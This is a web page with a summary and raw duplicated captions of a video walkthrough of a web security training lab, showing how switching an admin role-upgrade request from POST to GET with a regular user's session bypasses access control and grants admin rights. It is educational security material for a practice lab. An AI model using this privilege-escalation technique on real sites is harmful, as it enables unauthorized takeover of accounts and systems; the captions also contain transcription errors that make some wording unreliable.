Broken Access Control - Lab #6 Method-based access control can be circumvented

Broken Access Control - Lab #6 Method-based access control can be circumvented | Short Version

Method-Based Access Control can be Circumvented

This lab implements access controls based partly on the HTTP method of requests. To solve the lab, you need to familiarize yourself with the admin panel by logging in using the credentials administrator admin. Once logged in, you should be able to exploit the flawed access controls to promote yourself to become an administrator.

The target goal of this exercise is to exploit a broken Access Control vulnerability in order to promote the user that we were given so the regular user to become an administrator. The way to achieve this is first by logging in using the administrator account and learning how the functionality that promotes a user works, then after learning how that functionality Works, you're going to try and exploit it from your regular user account.

Accessing the Lab

While the lab loads up, you can see over here that this browser is the built-in browser and burp. Therefore, you don't have to configure it to send requests to burp because it's done by default. So all my requests should be in the HTTP history tab over here. The first thing I'm going to do is log in with the admin account and see how that functionality functions. Administrator and I believe the password was admin. Okay, so we're logged into the administrator account.

You can see that there's a functionality to upgrade or promote a user into an administrator user you could also downgrade a user. So let's try and upgrade our Carlos user because this is the user that we were given and I don't want to mess with it right now. Let's upgrade our Carlos user click upgrade and here we go. This is the request that is being performed. It's a post request. Let's send this to repeater and look at it.

The endpoint is slash admin roles and if we go down it takes in the username of the user and the action that they want to perform so upgrade is to promote the user and I'm guessing if we click on downgrade it'll downgrade the user to a regular user privilege. Okay, and it's a post request right over here okay.

How the Functionality Works

Now that we understand how it functions, let's log out and log in with the regular account privileges that we were given and then try to see if there's any access control vulnerabilities to promote our user to an administrator user. Hit my account and then log in with the account that we were given so the password was Peter hit login now.

Notice over here for our account we don't see an admin panel because we don't have the Privileges of an admin user. So what we're gonna do is we're going to look at my account. If we click on my account right over here you could see that this is uh the ID right over here of the user. Let's assume we tested this parameter and it's not vulnerable to any access control vulnerabilities.

So what I'm going to do is I'm going to copy the session ID of this user and try to perform this request using the session ID of my regular privileged user so if I put it right in here hit send and here we go. It says it's unauthorized. This user who has regular privileges does not have the ability to promote a user to an admin user which makes sense but if this is implemented incorrectly and the access control is only implemented on the type up method so let's say the post method but it's not implemented on the get method and the get method is a lot then we might have a broken Access Control vulnerability.

To test for this potential vulnerability, what we're going to do is we're going to right click and we're going to say change request method so now it's a get method and the parameters are in the URL. We're going to change this to the account that we're currently working with. So I want to promote my user to an admin user and I'm going to hit send and see what I get and here we go we got a 302. Just because we didn't get an unauthorized that's already a good sign and then if we follow redirection it's a 200 okay.

Conclusion

So we successfully completed the exercise by manually exploiting the broken Access Control vulnerability. Now, let's script it in Python to see a detailed version of the video where we first exploit the vulnerability manually and then scripted in Python check out the video linked on the screen also make sure to hit the Subscribe button and check out my course if you're interested in seeing more videos like this one thank you and see you in the next video.

"WEBVTTKind: captionsLanguage: enhi everyone welcome back to another video in the web Security Academy Series in today's video we'll be covering lab number six in the access control vulnerabilities module titled method-based Access Control can be circumvented alright let's get started this lab implements access controls based partly on the HTTP method of requests you can familiarize yourself with the admin panel by logging in using the credentials administrator admin to solve the lab login using the credentials of this user over here and exploit the flawed access controls to promote yourself to become an administrator alright so the target goal of the exercise is to exploit a broken Access Control vulnerability in order to promote the user that we were given so the regular user to become an administrator and the way that we're going to do that is first we're going to log in using the administrator account and learn how the functionality that promotes a user works and then after we learn how that functionality Works we're going to try and exploit it from our regular user account okay let's access the lab and while that loads up you can see over here that this browser is the built-in browser and burp and therefore we don't have to configure it to send requests to burp because it's done by default so all my requests should be in the HTTP history tab over here all right so the first thing I'm going to do is log in with the admin account and see how that functionality functions so administrator and I believe the password was admin okay so we're logged into the administrator account if we click on admin panel you could see that there's a functionality to upgrade or promote a user into an administrator user you could also downgrade a user so let's try and upgrade our Carlos user because this is the user that we were given and I don't want to mess with it right now so let's upgrade our Carlos user click upgrade and here we go this is the request that is being performed it's a post request let's send this to repeater and look at it so over here the endpoint is slash admin roles and if we go down it takes in the username of the user and the action that they want to perform so upgrade is to promote the user and I'm guessing if we click on downgrade it'll downgrade the user to a regular user privilege all right and it's a post request right over here okay so this looks good now we understand how it functions so let's log out and log in with the regular account privileges that we were given and then try to see if there's any access control vulnerabilities to promote our user to an administrator user so hit my account and then log in with the account that we were given so the password was Peter hit login now notice over here for our account we don't see an admin panel because we don't have the Privileges of an admin user so what we're gonna do is we're going to look at my account so if we click on my account right over here you could see that this is uh the ID right over here of the user let's assume we tested this parameter and it's not vulnerable to any access control vulnerabilities so what I'm going to do is I'm going to copy the session ID of this user and try to perform this request using the session ID of my regular privileged user so if I put it right in here hit send and here we go it says it's unauthorized so this user who has regular privileges does not have the ability to promote a user to an admin user which makes sense but if this is implemented incorrectly and the access control is only implemented on the type up method so let's say the post method but it's not implemented on the get method and the get method is a lot then we might have a broken Access Control vulnerability so what we're going to do is we're going to right click and we're going to say change request method so now it's a get method and the parameters are in the URL we're going to change this to the account that we're currently working with so I want to promote my user to an admin user and I'm going to hit send and see what I get and here we go we got a 302 so just because we didn't get an unauthorized that's already a good sign and then if we follow redirection it's a 200 okay and you can see over here it says congratulations you solved the lab if we refresh the page we should see the admin panel because we've promoted ourselves to an admin user all right so we successfully completed the exercise by manually exploiting the broken axis control vulnerability now let's script it in Python if you would like to see a detailed version of the video where we first exploit the vulnerability manually and then scripted in Python check out the video linked on the screen also make sure to hit the Subscribe button and check out my course if you're interested in seeing more videos like this one thank you and see you in the next videohi everyone welcome back to another video in the web Security Academy Series in today's video we'll be covering lab number six in the access control vulnerabilities module titled method-based Access Control can be circumvented alright let's get started this lab implements access controls based partly on the HTTP method of requests you can familiarize yourself with the admin panel by logging in using the credentials administrator admin to solve the lab login using the credentials of this user over here and exploit the flawed access controls to promote yourself to become an administrator alright so the target goal of the exercise is to exploit a broken Access Control vulnerability in order to promote the user that we were given so the regular user to become an administrator and the way that we're going to do that is first we're going to log in using the administrator account and learn how the functionality that promotes a user works and then after we learn how that functionality Works we're going to try and exploit it from our regular user account okay let's access the lab and while that loads up you can see over here that this browser is the built-in browser and burp and therefore we don't have to configure it to send requests to burp because it's done by default so all my requests should be in the HTTP history tab over here all right so the first thing I'm going to do is log in with the admin account and see how that functionality functions so administrator and I believe the password was admin okay so we're logged into the administrator account if we click on admin panel you could see that there's a functionality to upgrade or promote a user into an administrator user you could also downgrade a user so let's try and upgrade our Carlos user because this is the user that we were given and I don't want to mess with it right now so let's upgrade our Carlos user click upgrade and here we go this is the request that is being performed it's a post request let's send this to repeater and look at it so over here the endpoint is slash admin roles and if we go down it takes in the username of the user and the action that they want to perform so upgrade is to promote the user and I'm guessing if we click on downgrade it'll downgrade the user to a regular user privilege all right and it's a post request right over here okay so this looks good now we understand how it functions so let's log out and log in with the regular account privileges that we were given and then try to see if there's any access control vulnerabilities to promote our user to an administrator user so hit my account and then log in with the account that we were given so the password was Peter hit login now notice over here for our account we don't see an admin panel because we don't have the Privileges of an admin user so what we're gonna do is we're going to look at my account so if we click on my account right over here you could see that this is uh the ID right over here of the user let's assume we tested this parameter and it's not vulnerable to any access control vulnerabilities so what I'm going to do is I'm going to copy the session ID of this user and try to perform this request using the session ID of my regular privileged user so if I put it right in here hit send and here we go it says it's unauthorized so this user who has regular privileges does not have the ability to promote a user to an admin user which makes sense but if this is implemented incorrectly and the access control is only implemented on the type up method so let's say the post method but it's not implemented on the get method and the get method is a lot then we might have a broken Access Control vulnerability so what we're going to do is we're going to right click and we're going to say change request method so now it's a get method and the parameters are in the URL we're going to change this to the account that we're currently working with so I want to promote my user to an admin user and I'm going to hit send and see what I get and here we go we got a 302 so just because we didn't get an unauthorized that's already a good sign and then if we follow redirection it's a 200 okay and you can see over here it says congratulations you solved the lab if we refresh the page we should see the admin panel because we've promoted ourselves to an admin user all right so we successfully completed the exercise by manually exploiting the broken axis control vulnerability now let's script it in Python if you would like to see a detailed version of the video where we first exploit the vulnerability manually and then scripted in Python check out the video linked on the screen also make sure to hit the Subscribe button and check out my course if you're interested in seeing more videos like this one thank you and see you in the next video\n"

Random Videos